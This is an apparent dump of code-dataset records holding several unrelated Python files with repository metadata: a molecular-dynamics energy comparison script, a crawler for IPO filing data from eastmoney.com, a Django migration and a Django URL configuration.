defines, sysargs, mdp_opts = interpret_mdp(mdp_file)
# Gromacs calculation
GMX_Energy, GMX_Force, Ecomps_GMX = Calculate_GMX(gro_file, top_file, mdp_file)
GMX_Force = GMX_Force.reshape(-1,3)
# Print Gromacs energy components
printcool_dictionary(Ecomps_GMX, title="GROMACS energy components")
# ParmEd-OpenMM calculation
Structure, OMM_Energy, OMM_Force, Ecomps_OMM = Calculate_ParmEd_OpenMM(gro_file, top_file, sysargs, defines)
if args.amber:
# AMBER calculation (optional)
AMBER_Energy, AMBER_Force, Ecomps_AMBER = Calculate_AMBER(Structure, mdp_opts)
AMBER_Force = AMBER_Force.reshape(-1,3)
# Print AMBER energy components
printcool_dictionary(Ecomps_AMBER, title="AMBER energy components")
# Construct arrays of energy and force differences
if args.amber:
Names = ['Gromacs', 'OpenMM', 'AMBER']
Energies = np.array([GMX_Energy, OMM_Energy.value_in_unit(u.kilojoule_per_mole), AMBER_Energy])
Forces = np.array([GMX_Force, OMM_Force, AMBER_Force])
else:
Names = ['Gromacs', 'OpenMM']
Energies = np.array([GMX_Energy, OMM_Energy.value_in_unit(u.kilojoule_per_mole)])
Forces = np.array([GMX_Force, OMM_Force])
D_Energy = []
D_FrcRMS = []
D_FrcMax = []
D_Names = []
for i in range(1, len(Names)):
for j in range(i):
D_Names.append('%s-%s' % (Names[j],Names[i]))
D_Energy.append(Energies[j]-Energies[i])
D_Force = Forces[j]-Forces[i]
D_FrcRMS.append(np.sqrt(np.mean([sum(k**2) for k in D_Force])))
D_FrcMax.append(np.sqrt(np.max(np.array([sum(k**2) for k in D_Force]))))
# Print the net force on the first three atoms (e.g. water molecule)
# print np.sum(GMX_Force[:3], axis=0)
# print np.sum(AMBER_Force[:3], axis=0)
# Final printout
print "Energy Difference (kJ/mol):"
for i in range(len(D_Names)):
print "%-14s % .6e" % (D_Names[i], D_Energy[i])
print "RMS / Max Force Difference (kJ/mol/nm):"
for i in range(len(D_Names)):
print "%-14s % .6e % .6e" % (D_Names[i], D_FrcRMS[i], D_FrcMax[i])
if __name__ == "__main__":
main()
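# Usage sketch (added note, not part of the original script; the script and input
# file names below are hypothetical examples):
#
#     python compare_gmx_omm.py conf.gro topol.top grompp.mdp
#
# main() reads the coordinate (.gro), topology (.top) and run-parameter (.mdp) files
# from the first three command-line arguments; the GROMACS tools (grompp, mdrun,
# energy, traj, gmxdump) must be on PATH, and the optional AMBER comparison
# additionally requires sander.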
|
[
"kmckiern@stanford.edu"
] |
kmckiern@stanford.edu
|
1a9c0582881aadedc8e4ddbfe2db0f031c65bf04
|
0a973640f0b02d7f3cf9211fcce33221c3a50c88
|
/.history/src/easy-money_20210202115145.py
|
2ec490dc5b008658f27f3b4bf5b19dc59224777f
|
[] |
no_license
|
JiajunChen123/IPO_under_review_crawler
|
5468b9079950fdd11c5e3ce45af2c75ccb30323c
|
031aac915ebe350ec816c05a29b5827fde588567
|
refs/heads/main
| 2023-02-26T08:23:09.622725
| 2021-02-04T10:11:16
| 2021-02-04T10:11:16
| 332,619,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 20,153
|
py
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
# East Money (eastmoney.com) IPO initial-filing (首发申报) data crawler
import re
import pickle
from datetime import datetime, timedelta
from urllib.parse import urlencode
import pandas as pd
import requests
import re
import time
from bs4 import BeautifulSoup
import configparser
import os.path
from utils import save_pickle,load_pickle
config = configparser.ConfigParser()
config.read('./src/Config.ini')
# headers = config['eastmoney']['headers']
base_url = config['eastmoney']['base_url']
headers = {
'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36'}
def dateList_gen():
r = requests.get('http://data.eastmoney.com/xg/xg/sbqy.html',
headers=headers)
r.encoding = 'gbk'
soup = BeautifulSoup(r.text, 'html.parser')
dateList = [i.text for i in soup.findAll('option')]
return dateList
def update_date():
r = requests.get('http://data.eastmoney.com/xg/xg/sbqy.html',
headers=headers)
r.encoding = 'gbk'
soup = BeautifulSoup(r.text, 'html.parser')
newDate = soup.find('option').get_text()
return newDate
def update_eastmoneyData(newDate):
    # If the raw-data file already exists, run an incremental update
if os.path.isfile(config['eastmoney']['eastmoney_raw_data']):
# newDate = update_date()
        # Only fetch when the site reports a newer date than the last one recorded
if newDate != config['eastmoney']['lastDate']:
query = {
'type': 'NS',
'sty': 'NSFR',
'st': '1',
'sr': '-1',
'p': '1',
'ps': '5000',
'js': 'var IBhynDx={pages:(pc),data:[(x)]}',
'mkt': '1',
'fd': newDate,
'rt': '53721774'
}
url = base_url + urlencode(query)
rs = requests.get(url, headers=headers)
js = rs.text.split('var IBhynDx={pages:1,data:')[1]
data = eval(js[:-1])
temp = [i.split(',') for i in data]
columns = [
'会计师事务所', '保荐代表人', '保荐机构', 'xxx', '律师事务所', '日期', '所属行业', '板块',
'是否提交财务自查报告', '注册地', '类型', '机构名称', '签字会计师', '签字律师', '时间戳', '简称'
]
df = pd.DataFrame(temp, columns=columns)
df['文件链接'] = df['时间戳'].apply(
lambda x: "https://notice.eastmoney.com/pdffile/web/H2_" + x + "_1.pdf"
)
df = df[[
'机构名称', '类型', '板块', '注册地', '保荐机构', '保荐代表人', '律师事务所', '签字律师', '会计师事务所',
'签字会计师', '是否提交财务自查报告', '所属行业', '日期', 'xxx', '时间戳', '简称', '文件链接'
]]
df = df[df['板块'] != '创业板']
            # pandas.DataFrame.replace is not in-place; keep the result
            df = df.replace({'是否提交财务自查报告': ' '}, '是')
            df = df.replace({'是否提交财务自查报告': '不适用'}, '是')
df['机构名称'] = df['机构名称'].replace(r'\*', '', regex=True)
df['机构名称'] = df['机构名称'].replace(r'股份有限公司', '', regex=True)
df.to_csv(
'C:/Users/chen/Desktop/IPO_info/EastMoney/eastmoney_raw_data.csv',mode='a',
index=False, header=False, encoding='utf-8-sig')
return df
else:
df = pd.read_csv(config['eastmoney']['eastmoney_raw_data'])
else:
dateList = dateList_gen()
df = get_eastmoneyData(dateList)
return df
def get_eastmoneyData(dateList):
query = {'type': 'NS',
'sty': 'NSFR',
'st': '1',
'sr': '-1',
'p': '1',
'ps': '5000',
'js': 'var IBhynDx={pages:(pc),data:[(x)]}',
'mkt': '1',
'fd' :'',
'rt': '53721774'
}
main_data = []
for date in dateList:
print('fetching date: ',date)
query['fd'] = date
# start = datetime.strptime('2017-01-05','%Y-%m-%d').date()
# while start < datetime.today().date():
# query['fd'] = start
url = base_url + urlencode(query)
print(url)
# yield url
# start += timedelta(days=7)
rs = requests.get(url, headers=headers)
if rs.text == '':
continue
js = rs.text.split('var IBhynDx={pages:1,data:')[1]
data = eval(js[:-1])
main_data.extend(data)
time.sleep(2)
temp = [i.split(',') for i in main_data]
columns = [
'会计师事务所', '保荐代表人', '保荐机构', 'xxx', '律师事务所', '日期', '所属行业', '板块',
'是否提交财务自查报告', '注册地', '类型', '机构名称', '签字会计师', '签字律师', '时间戳', '简称'
]
df = pd.DataFrame(temp, columns=columns)
df['文件链接'] = df['时间戳'].apply(
lambda x: "https://notice.eastmoney.com/pdffile/web/H2_" + x + "_1.pdf"
)
df = df[[
'机构名称', '类型', '板块', '注册地', '保荐机构', '保荐代表人', '律师事务所', '签字律师', '会计师事务所',
'签字会计师', '是否提交财务自查报告', '所属行业', '日期', 'xxx', '时间戳', '简称', '文件链接'
]]
df = df[df['板块'] != '创业板']
    # pandas.DataFrame.replace is not in-place; keep the result
    df = df.replace({'是否提交财务自查报告': ' '}, '是')
    df = df.replace({'是否提交财务自查报告': '不适用'}, '是')
df['机构名称'] = df['机构名称'].replace(r'\*', '', regex=True)
df['机构名称'] = df['机构名称'].replace(r'股份有限公司', '', regex=True)
df.to_csv('C:/Users/chen/Desktop/IPO_info/EastMoney/eastmoney_raw_data.csv',
index=False,
encoding='utf-8-sig')
return df
def get_meetingData(newDate):
if newDate != config['eastmoney']['lastDate'] or not os.path.isfile(config['eastmoney']['eastmoney_meeting']):
meetingInfo = []
        for marketType in ['2', '4']:  # 2 = main board, 4 = SME board
query = {
'type': 'NS',
'sty': 'NSSH',
'st': '1',
'sr': '-1',
'p': '1',
'ps': '5000',
'js': 'var IBhynDx={pages:(pc),data:[(x)]}',
'mkt': marketType,
'rt': '53723990'
}
url = base_url + urlencode(query)
rss = requests.get(url, headers=headers)
jss = rss.text.split('var IBhynDx={pages:1,data:')[1]
data = eval(jss[:-1])
meetingInfo.extend(data)
temp = [j.split(',') for j in meetingInfo]
columns = [
'时间戳', 'yyy', '公司代码', '机构名称', '详情链接', '申报日期', '上会日期', '申购日期', '上市日期',
'9', '拟发行数量', '发行前总股本', '发行后总股本', '13', '占发行后总股本比例', '当前状态', '上市地点',
'主承销商', '承销方式', '发审委委员', '网站', '简称'
]
df = pd.DataFrame(temp, columns=columns)
df['文件链接'] = df['时间戳'].apply(
lambda x: "https://notice.eastmoney.com/pdffile/web/H2_" + x + "_1.pdf"
)
df['详情链接'] = df['公司代码'].apply(
lambda x: "data.eastmoney.com/xg/gh/detail/" + x + ".html")
df = df[[
'机构名称', '当前状态', '上市地点', '拟发行数量', '申报日期', '上会日期', '申购日期', '上市日期',
'主承销商', '承销方式', '9', '发行前总股本', '发行后总股本', '13', '占发行后总股本比例', '发审委委员',
'网站', '公司代码', 'yyy', '时间戳', '简称', '详情链接', '文件链接'
]]
df.to_csv(
config['eastmoney']['eastmoney_meeting'],
index=False,
encoding='utf-8-sig')
else:
df = pd.read_csv(config['eastmoney']['eastmoney_meeting'])
return df
def update_zzscData(newDate):
if os.path.isfile(config['eastmoney']['zzsc_pkl']):
if newDate != config['eastmoney']['lastDate']:
zzsc_dict = load_pickle(config['eastmoney']['zzsc_pkl'])
query = {
'type': 'NS',
'sty': 'NSSE',
'st': '1',
'sr': '-1',
'p': '1',
'ps': '500',
'js': 'var IBhynDx={pages:(pc),data:[(x)]}',
'mkt': '4',
'stat': 'zzsc',
'fd': newDate,
'rt': '53727636'
}
url = base_url + urlencode(query)
rss = requests.get(url, headers=headers)
if rss.text == 'var IBhynDx={pages:0,data:[{stats:false}]}':
return
jss = rss.text.split('var IBhynDx={pages:1,data:')[1]
data = eval(jss[:-1])
for i in data:
name = i.split(',')[1]
if name not in zzsc_dict:
zzsc_dict[name] = i.split(',')[2]
else:
continue
zzsc_df = pd.DataFrame(zzsc_dict.items(), columns=['机构名称', '决定终止审查时间'])
zzsc_df.to_csv('C:/Users/chen/Desktop/IPO_info/EastMoney/eastmoney_zzsc.csv',mode='a',
encoding='utf-8-sig',
index=False)
save_pickle(zzsc_dict,config['eastmoney']['zzsc_pkl'])
else:
zzsc_df = pd.read_csv(config['eastmoney']['zzsc_csv'])
else:
dateList = dateList_gen()
zzsc_df = get_zzscData(dateList)
return zzsc_df
def get_zzscData(dateList):
zzsc_dict = {}
for date in dateList:
query = {
'type': 'NS',
'sty': 'NSSE',
'st': '1',
'sr': '-1',
'p': '1',
'ps': '500',
'js': 'var IBhynDx={pages:(pc),data:[(x)]}',
'mkt': '4',
'stat': 'zzsc',
'fd': date,
'rt': '53727636'
}
url = base_url + urlencode(query)
rss = requests.get(url, headers=headers)
if rss.text == 'var IBhynDx={pages:0,data:[{stats:false}]}':
continue
jss = rss.text.split('var IBhynDx={pages:1,data:')[1]
data = eval(jss[:-1])
for i in data:
name = i.split(',')[1]
if name not in zzsc_dict:
zzsc_dict[name] = i.split(',')[2]
else:
continue
time.sleep(2)
zzsc_df = pd.DataFrame(zzsc_dict.items(), columns=['机构名称', '决定终止审查时间'])
zzsc_df.to_csv('C:/Users/chen/Desktop/IPO_info/EastMoney/eastmoney_zzsc.csv',
encoding='utf-8-sig',
index=False)
save_pickle(zzsc_dict,config['eastmoney']['zzsc_pkl'])
return zzsc_df
def eastmoney_cleanUP():
east_money = pd.read_csv(
'C:/Users/chen/Desktop/IPO_info/EastMoney/eastmoney_raw_data.csv')
    # pandas.DataFrame.replace is not in-place; keep the result
    east_money = east_money.replace({'是否提交财务自查报告': ' '}, '是')
    east_money = east_money.replace({'是否提交财务自查报告': '不适用'}, '是')
east_money['机构名称'] = east_money['机构名称'].replace(r'\*', '', regex=True)
east_money['机构名称'] = east_money['机构名称'].replace(r'股份有限公司', '', regex=True)
east_money['机构名称'] = east_money['机构名称'].replace(r'\(', '(', regex=True)
east_money['机构名称'] = east_money['机构名称'].replace(r'\)', ')', regex=True)
east_money = east_money[east_money['板块'] != '创业板']
east_money['类型'] = pd.Categorical(east_money['类型'],
categories=["已受理","已反馈","预先披露更新","中止审查","已提交发审会讨论,暂缓表决",
"已上发审会,暂缓表决","已通过发审会"],ordered=True)
east_money.sort_values(['机构名称','类型','受理日期'], inplace=True)
# east_money.to_csv('C:/Users/chen/Desktop/IPO_info/pre_cleab.csv',encoding='utf-8-sig',index=False)
east_money.drop_duplicates(subset=['机构名称', '类型'],
keep='first',
inplace=True)
east_money.to_csv(
'C:/Users/chen/Desktop/IPO_info/EastMoney/eastmoney_data_cleaned.csv',
encoding='utf-8-sig',
index=False)
return east_money
def gen_finalData(cleaned_easymoney_df, meetingInfo_df, zzsc_df):
'''
主板、中小板 = {'机构名称':'',
'简称':'',
'Wind代码':'',
'统一社会信用代码':'',
'板块':'',
'注册地':'',
'所属行业':'',
'经营范围':'',
'预先披露':'[日期]',
'已反馈':'[日期]',
'预先披露更新':'[日期]',
'发审会':{'中止审查':'[日期]',
'已上发审会,暂缓表决':'[日期]',
'已提交发审会讨论,暂缓表决:'[日期]',
'已通过发审会':'[日期]'},
'终止审查':'[日期]',
'上市日期':'[日期]',
'保荐机构':'',
'律师事务所':,
'会计师事务所':'',
'发行信息':{'拟发行数量':'',
'发行前总股本':'',
'发行后总股本':''},
'反馈文件':'[链接]'
}
'''
    shzb_stocksInfo = {}   # Shanghai main board
    szzxb_stocksInfo = {}  # Shenzhen SME board
    all_data = {}          # all records
ekk = cleaned_easymoney_df.values.tolist()
for i in ekk:
if i[0] not in all_data:
all_data[i[0]] = {
'机构名称': i[0] + '股份有限公司',
'简称': i[15],
'Wind代码': '',
'统一社会信用代码': '',
'板块': i[2],
'注册地': '',
'所属行业': '',
'经营范围': '',
'预先披露': '',
'已反馈': '',
'预先披露更新': '',
'发审会': {
'中止审查': '',
'已上发审会,暂缓表决': '',
'已提交发审会讨论,暂缓表决': '',
'已通过发审会': ''
},
'终止审查': '',
'上市日期': '',
'保荐机构': i[4],
'保荐代表人': '',
'律师事务所': i[6],
'签字律师': '',
'会计师事务所': i[8],
'签字会计师': '',
'发行信息': {
'拟发行数量(万)': '',
'发行前总股本(万)': '',
'发行后总股本(万)': ''
},
'反馈文件': ''
}
if i[1] == '已受理':
all_data[i[0]]['预先披露'] = i[12]
elif i[1] == '已反馈':
all_data[i[0]]['已反馈'] = i[12]
elif i[1] == '预先披露更新':
all_data[i[0]]['预先披露更新'] = i[12]
elif i[1] == '已通过发审会':
all_data[i[0]]['发审会']['已通过发审会'] = i[12]
elif i[1] == '已提交发审会讨论,暂缓表决':
all_data[i[0]]['发审会']['已提交发审会讨论,暂缓表决'] = i[12]
elif i[1] == '已上发审会,暂缓表决':
all_data[i[0]]['发审会']['已上发审会,暂缓表决'] = i[12]
elif i[1] == '中止审查':
all_data[i[0]]['发审会']['中止审查'] = i[12]
if all_data[i[0]]['注册地'] == '' and i[3] != '':
all_data[i[0]]['注册地'] = i[3]
if all_data[i[0]]['所属行业'] == '' and i[11] != '':
all_data[i[0]]['所属行业'] = i[11]
if all_data[i[0]]['保荐代表人'] == '' and i[5] != '':
all_data[i[0]]['保荐代表人'] = i[5]
if all_data[i[0]]['签字律师'] == '' and i[7] != '':
all_data[i[0]]['签字律师'] = i[7]
if all_data[i[0]]['签字会计师'] == '' and i[9] != '':
all_data[i[0]]['签字会计师'] = i[9]
    # Add review-meeting (发审会) information for each company
ekk2 = meetingInfo_df.values.tolist()
error_set = {}
for i in ekk2:
i[0] = i[0].replace(r'股份有限公司', '')
if i[0] not in all_data:
print("Error: Cannot find ", i[0])
error_set.update({i[0]: i[5]})
continue
if i[1] == '上会未通过':
all_data[i[0]]['发审会']['上会未通过'] = i[5]
elif i[1] == '取消审核':
all_data[i[0]]['发审会']['取消审核'] = i[5]
elif i[1] == '上会通过':
all_data[i[0]]['发审会']['已通过发审会'] = i[5]
        if i[7] != '':
            all_data[i[0]]['上市日期'] = i[7]
        # amounts are stored in 万 (ten-thousands) under the keys defined in the schema above
        all_data[i[0]]['发行信息']['拟发行数量(万)'] = "{:.2f}".format(int(i[3]) / 10000)
        all_data[i[0]]['发行信息']['发行前总股本(万)'] = "{:.2f}".format(int(i[11]) / 10000)
        all_data[i[0]]['发行信息']['发行后总股本(万)'] = "{:.2f}".format(int(i[12]) / 10000)
    # Add termination-of-review (终止审查) dates
ekk3 = zzsc_df.values.tolist()
for i in ekk3:
name = i[0].replace(r'股份有限公司', '')
if name not in all_data:
print("Error: Cannot find in zzsc", i[0])
error_set.update({name: i[1]})
continue
all_data[name]['终止审查'] = i[1]
for key, value in all_data.items():
if value['板块'] == '中小板' and value['终止审查'] == '' and value['上市日期'] == '':
szzxb_stocksInfo.update({key: value})
if value['板块'] == '主板企业' and value['终止审查'] == '' and value['上市日期'] == '':
shzb_stocksInfo.update({key: value})
save_pickle(szzxb_stocksInfo, config['eastmoney']['szzxb_stocksInfo'])
save_pickle(shzb_stocksInfo, config['eastmoney']['shzb_stocksInfo'])
save_pickle(all_data, config['eastmoney']['zb_zxb_stocksInfo'])
return all_data, shzb_stocksInfo, szzxb_stocksInfo
# def update_all():
# try:
# with open('','rb') as file:
# zb_zxb_dict = pickle.load(file)
# _,temp = update_eastmoneyData()
# for i in temp:
# if i not in zb_zxb_dict:
# pass
# else:
# # columns = [
# # '会计师事务所', '保荐代表人', '保荐机构', 'xxx', '律师事务所', '日期', '所属行业', '板块',
# # '是否提交财务自查报告', '注册地', '类型', '机构名称', '签字会计师', '签字律师', '时间戳', '简称'
# # ]
# i[]
if __name__ == '__main__':
newDate = update_date()
update_eastmoneyData(newDate)
east_money_df = eastmoney_cleanUP()
meetingInfo_df = get_meetingData(newDate)
zzsc_df = update_zzscData(newDate)
# dateList = date_gen()
# get_eastmoneyData(dateList)
# east_money_df = eastmoney_cleanUP()
# east_money_df = pd.read_csv('C:/Users/chen/Desktop/IPO_info/EastMoney/easymoney_data_new.csv',keep_default_na=False)
# meetingInfo_df = pd.read_csv('C:/Users/chen/Desktop/IPO_info/EastMoney/eastmoney_data_meeting.csv',keep_default_na=False)
# meetingInfo_df = get_meetingData()
# zzsc_df = pd.read_csv('C:/Users/chen/Desktop/IPO_info/EastMoney/zzsc.csv')
all_data,_,_ = gen_finalData(east_money_df,meetingInfo_df,zzsc_df)
print('Complete!')
|
[
"chenjiajun.jason@outlook.com"
] |
chenjiajun.jason@outlook.com
|
f905ba677261eb44247ee0d2cae42ade3f0e3697
|
bbcb57ec37b81e566dfb27936dbf71c544776a11
|
/eventkit_cloud/tasks/migrations/0017_auto_20170623_0011.py
|
f9f5fb33171ef484f85b24a15d35eaebffaf8992
|
[] |
no_license
|
bradh/eventkit-cloud
|
8bfa85ccff4aaed879f3fac1e48025053b719615
|
7238e5e33fcef29a12cc50328a52afa1292e23aa
|
refs/heads/master
| 2020-03-07T12:51:34.994546
| 2018-03-28T13:03:31
| 2018-03-28T13:03:31
| 127,486,879
| 0
| 0
| null | 2018-03-31T01:04:18
| 2018-03-31T01:04:18
| null |
UTF-8
|
Python
| false
| false
| 762
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-06-23 00:11
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('tasks', '0016_auto_20170622_2359'),
]
operations = [
migrations.RenameField(
model_name='exporttask',
old_name='new_result',
new_name='result',
),
migrations.RemoveField(
model_name='fileproducingtaskresult',
name='task',
),
migrations.AlterField(
model_name='fileproducingtaskresult',
name='id',
field=models.AutoField(primary_key=True, editable=False, serialize=False),
),
]
|
[
"joseph.svrcek@rgi-corp.com"
] |
joseph.svrcek@rgi-corp.com
|
1a95ca5c5a371e2fdc0ceba339b688dedd2ee9e0
|
0a82a05be26aa10aba5968cd9d07fb83e76877e0
|
/orm_relationship_demo/urls.py
|
037c92143399ab3935fe85fcb43c0af0c52bc528
|
[] |
no_license
|
RubbishBird/orm_relationship_demo
|
5179a83488cb43a1988734770b576547889f17cc
|
ab29c98b52eb6230d99a399a67827b152de522a0
|
refs/heads/master
| 2020-04-07T16:45:40.368680
| 2018-11-27T00:22:42
| 2018-11-27T00:22:42
| 158,541,900
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 773
|
py
|
"""orm_relationship_demo URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
urlpatterns = [
path('', include('article.urls')),
]
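# Sketch of how further routes would be wired, following the docstring above.
# The admin route and the 'blog.urls' module are illustrative assumptions, not
# part of this project's source:
#
#     urlpatterns += [
#         path('admin/', admin.site.urls),
#         path('blog/', include('blog.urls')),
#     ]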
|
[
"1158784496@qq.com"
] |
1158784496@qq.com
|
d47affe9a305639d964aacb372d3479ab318e72a
|
80600ef7dfc21fc13e1e91aa96f989e143dc8fc8
|
/tests/test_users_routing.py
|
2a7d8f35ed8af93db16770bbe0cfe6f17f935cf2
|
[] |
no_license
|
TooTiredOne/movies-rating
|
eb6ae4c7c98e820755519263ccb02b8b96aebdb1
|
c94876a3cc438b9ca873d85e594edb8e6320437d
|
refs/heads/master
| 2023-04-04T04:58:16.045862
| 2021-04-27T13:22:18
| 2021-04-27T13:22:18
| 362,119,325
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,465
|
py
|
import json
import pytest
from app import models, schemas
from app.utils import make_password_hash
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
def test_registration(unauth_client, session, db_users):
response = unauth_client.post(
'/users', json={'username': 'new_user', 'password': 'pass'}
)
users = session.query(models.User).all()
new_user = session.query(models.User).filter_by(username='new_user').one()
assert response.status_code == 201
assert response.json()['username'] == 'new_user'
assert new_user.hashed_password == make_password_hash('pass')
assert len(users) == len(db_users) + 1
def test_registration_existing_username(unauth_client, session, db_users):
response = unauth_client.post(
'/users', json={'username': 'username1', 'password': 'pass'}
)
users = session.query(models.User).all()
assert response.status_code == 409
assert response.json() == {'detail': 'Username already taken'}
assert len(users) == len(db_users)
@pytest.mark.parametrize(('limit', 'after_id'), [(20, 0), (1, 0), (1, 1), (1, 2)])
def test_get_all_users(session, auth_client, limit, after_id, db_users):
# new_user, auth = new_user_and_auth_head
response = auth_client.get(f'/users?limit={limit}&after_id={after_id}')
data = response.json()
expected_users = set(
(db_user.username, db_user.id)
for db_user in session.query(models.User)
.filter(models.User.id > after_id)
.order_by(models.User.id)
.limit(limit)
.all()
)
obtained_users = set((user['username'], user['id']) for user in data)
assert response.status_code == 200
assert expected_users == obtained_users
@pytest.mark.parametrize(('limit', 'after_id'), [(0, 0), (3, 'invalid')])
def test_get_all_users_incorrect_args(auth_client, limit, after_id, db_users):
response = auth_client.get(f'/users?limit={limit}&after_id={after_id}')
assert response.status_code == 422
assert 'detail' in response.json()
@pytest.mark.parametrize(('user_id', 'movie_id'), [(1, 2), (2, 2), (1, 3)])
def test_get_user_review_on_movie_correct_args(
user_id, movie_id, auth_client, session, db_user1_reviews, db_user2_reviews
):
response = auth_client.get(f'/users/{user_id}/reviews/movies/{movie_id}')
expected_review = (
db_user1_reviews[movie_id - 1]
if user_id == 1
else db_user2_reviews[movie_id - 1]
)
expected_schema = (
schemas.Review.from_orm(expected_review) if expected_review else None
)
assert response.status_code == 200
if expected_schema:
assert response.json() == json.loads(expected_schema.json())
else:
assert not response.json()
@pytest.mark.parametrize(
('user_id', 'movie_id'),
[(100, 1), (1, 100), ('invalid string', 2), (2, 'invalid string')],
)
def test_get_user_review_on_movie_incorrect_args(
user_id, movie_id, auth_client, db_reviews
):
response = auth_client.get(f'/users/{user_id}/reviews/movies/{movie_id}')
if user_id == 'invalid string' or movie_id == 'invalid string':
assert response.status_code == 422
else:
assert response.status_code == 404
assert 'detail' in response.json()
@pytest.mark.parametrize(
'user_id',
[
1,
2,
],
)
def test_get_user_reviews_correct_args(
user_id, session, auth_client, db_user1_reviews, db_user2_reviews
):
response = auth_client.get(f'/users/{user_id}/reviews')
data = response.json()
reviews = db_user1_reviews if user_id == 1 else db_user2_reviews
expected_reviews = []
for review in reviews:
json_str = schemas.Review.from_orm(review).json()
expected_reviews.append(json.loads(json_str))
assert response.status_code == 200
assert data == expected_reviews
@pytest.mark.parametrize(
('user_id', 'limit', 'after_id', 'expected_code'),
[
(100, 20, 0, 404),
('invalid string', 20, 0, 422),
(1, 0, None, 422),
(1, 'invalid string', 0, 422),
(1, 3, 'incorrect bookmark', 422),
],
)
def test_get_user_reviews_incorrect_args(
user_id, limit, after_id, session, auth_client, db_reviews, expected_code
):
response = auth_client.get(
f'/users/{user_id}/reviews?limit={limit}&after_id={after_id}'
)
assert response.status_code == expected_code
assert 'detail' in response.json()
|
[
"kamaliyevkamil@gmail.com"
] |
kamaliyevkamil@gmail.com
|
1cea20b10c1c9935a7f33d90947c6af0f674d65e
|
2e16e1a986f20deaf35eb5d649a93cc093e246f6
|
/light/light_types.py
|
6ce316876908bf367c827f3eedd2e21aba0f5752
|
[
"MIT"
] |
permissive
|
crits/light
|
77569688c71d98f7fdc23a406656b608e269297c
|
ae2fdc51c2666338d7a17a43f34873c6849c57a4
|
refs/heads/master
| 2020-03-23T08:09:37.045784
| 2018-09-30T03:16:54
| 2018-09-30T03:16:54
| 141,310,970
| 5
| 3
|
MIT
| 2018-09-30T03:16:55
| 2018-07-17T15:45:24
|
Python
|
UTF-8
|
Python
| false
| false
| 3,674
|
py
|
import bson
from . import backend
class LightField(object):
def __init__(self, init=None, required=False, pk=False, unique=False):
self.required = required
self.pk = pk
self.unique = unique
self.assign(init)
self.field_name = type(self).__name__
def val(self):
return self.value
def assign(self, val):
self.value = val
return val
def __str__(self):
return str(self.val())
class LightStr(LightField):
def __init__(self, init=None, required=False, pk=False, unique=False):
super(LightStr, self).__init__(init, required, pk, unique)
def assign(self, val):
assert(isinstance(val, str))
super(LightStr, self).assign(val)
class LightInt(LightField):
def __init__(self, init=None, required=False, pk=False, unique=False):
super(LightInt, self).__init__(init, required, pk, unique)
def assign(self, val):
assert(isinstance(val, int))
super(LightInt, self).assign(val)
class LightBool(LightField):
def __init__(self, init=None, required=False, pk=False, unique=False):
super(LightBool, self).__init__(init, required, pk, unique)
def assign(self, val):
assert(isinstance(val, bool))
super(LightBool, self).assign(val)
# A base type for a document object that, at least, matches the following
# signature:
#
# obj = {
# "id": ObjectId()
# }
#
class LightDoc(object):
def __init__(self, **kwargs):
self.special_fields = ['set_name']
self.valid = False
self.set_name = type(self).set_name
self.data = {}
self.pk = None
        # Dynamically identify the defined fields from the subclass definition.
        # Materialized to a list because it is iterated again further down; a lazy
        # filter object would already be exhausted on the second pass.
        db_fields = [x for x in vars(type(self)) if isinstance(getattr(type(self), x), LightField)]
for fieldk in db_fields:
new_field = getattr(type(self), fieldk)
self.data[fieldk] = new_field.val()
assert(not(self.pk and new_field.pk))
self.pk = new_field
        if 'oid' not in kwargs or kwargs['oid'] is None:
# If instance construction gives us a NoneType oid, then we presume
            # to be constructing a new entity, so give it a brand new ObjectId
self.data['id'] = bson.ObjectId()
# Also, walk the rest of the args for field initializers
for fieldk in db_fields:
if fieldk in kwargs:
self.data[fieldk] = type(getattr(self, fieldk))(init=kwargs[fieldk])
else:
self.data[fieldk] = type(getattr(self, fieldk))()
else:
# Otherwise, we are to perform a lookup and load of the designated
# object
self.load(kwargs['oid'])
def get_all(set_name, dtype):
for objid in backend.current_driver.get_all(set_name=set_name):
yield(dtype(oid=objid))
def save(self):
output_data = {}
for obj_key in self.data:
output_data[obj_key] = str(self.data[obj_key])
backend.current_driver.store(self.set_name, output_data)
def load(self, objid):
input_data = backend.current_driver.load(self.set_name, objid)
# Clear the instance data
self.data = {}
if input_data:
for obj_key in input_data:
if obj_key == 'id':
self.data[obj_key] = bson.ObjectId(input_data[obj_key])
else:
self.data[obj_key] = input_data[obj_key]
self.valid = True
else:
# Invalidate if the object doesn't exist
self.valid = False
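# Minimal usage sketch (not part of the original module; the document class, its
# fields and the set_name are illustrative assumptions, and backend.current_driver
# must already be configured):
#
#     class Player(LightDoc):
#         set_name = 'players'
#         name = LightStr(init='', pk=True)
#         score = LightInt(init=0)
#
#     p = Player(name='alice', score=0)   # no oid -> new document, fresh ObjectId
#     p.save()                            # persists via backend.current_driver.store
#     again = Player(oid=p.data['id'])    # reloads the stored document by its id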
|
[
"ckane@colemankane.org"
] |
ckane@colemankane.org
|
b10bd2955078b3d0376df93af01e66898e23f7bc
|
7015c9e091adfc90822706d78a066ae780266e43
|
/college_football_scraper/spiders/pro_football_spider.py
|
9bb88df7171dc5b2aade22d94385a5c3db0b00f3
|
[] |
no_license
|
Nemesisesq/crawlers
|
bf97523f4f57b7eef58e7f8ce04bd5a8fc98688e
|
0c7924a968b8525a0df7d11e64ba373daecf2a3e
|
refs/heads/master
| 2021-03-16T05:30:14.834286
| 2016-08-19T01:34:57
| 2016-08-19T01:34:57
| 66,019,523
| 0
| 0
| null | null | null | null |
UTF-8
|
